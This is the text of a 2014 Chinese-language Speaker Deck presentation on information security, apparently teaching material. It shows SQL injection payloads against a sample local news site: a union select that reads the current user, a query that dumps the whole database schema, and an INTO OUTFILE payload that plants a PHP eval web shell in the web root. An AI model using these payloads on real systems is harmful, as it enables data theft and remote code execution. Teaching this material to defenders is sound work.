Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Information Security

Information Security

AIS presentation
[email protected]

Bleu (Jia-Huei Ren)

February 24, 2014
Tweet

More Decks by Bleu (Jia-Huei Ren)

Other Decks in Technology

Transcript

  1. • 可以看出 3, 4, 7 的地方可以插入我們想要獲取的資 料, 假如我們想要知道當前使用者為何,可以將 7 的地

    方改成 user() 如: • http://localhost/news/?mod=news&act=show& id=-1 union select 1,2,3,4,5,6,user()
  2. • 使用(SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE

    @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name) )) ) )x)將整個資料庫dump出來
  3. 寫後門改首頁 • ?MOD=NEWS&ACT=SHOW&ID=1 INTO OUTFILE '../../../../apache24/htdoc s/.a.php' LINES TERMINATED BY

    '<?php eval($_GET[cmd];)?>' • 透過outfile的方式建立後門檔案到網站目 錄中
  4. XSS